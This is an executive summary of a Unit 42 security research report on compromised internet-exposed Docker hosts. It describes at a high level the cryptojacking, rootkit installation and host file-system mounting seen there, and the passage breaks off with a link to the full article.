Executive Summary
Between September and December 2019, Unit 42 researchers periodically scanned and collected metadata from Docker hosts exposed to the internet (largely due to inadvertent user errors) and this research reveals some of the tactics and techniques used by attackers in the compromised Docker engines. In total, 1,400 unsecured Docker hosts, 8,673 active containers, and 17,927 Docker images were discovered in our research. The Docker team worked quickly in tandem with Unit 42 to remove the malicious images once our team alerted them to this operation.
Container technology has gained enormous popularity in the past few years and is becoming the de facto way for packaging, delivering, and deploying modern applications. While the technology is quickly evolving and being adopted, it also becomes a valuable target for adversaries.
While the majority of the malicious activities involved cryptojacking (mostly mining for Monero), some compromised Docker engines were used for launching other attacks or installing rootkits on the hosts. Sensitive information, such as application credentials and infrastructure configuration were also found from the exposed logs. One interesting tactic we frequently saw was attackers mounted the entire host file system to a container and accessed the host operating system (OS) from the container to read/write from it.
We organized the observed malicious activities into the four categories below and provided an overview of each category with real samples.
Deploy Container Images with Malicious Code.Malicious images are first pushed to a public registry. The images are then pulled and deployed on the unsecured Docker hosts.
Deploy Benign Container Images and Download Malicious Payloads at Run Time.Benign images are deployed on the Docker hosts. Malicious payloads are then downloaded and executed inside the benign containers.
Deploy Malicious Payloads on the Host.Adversaries mount the entire host file ..
Support the originator by clicking the read the rest link below.
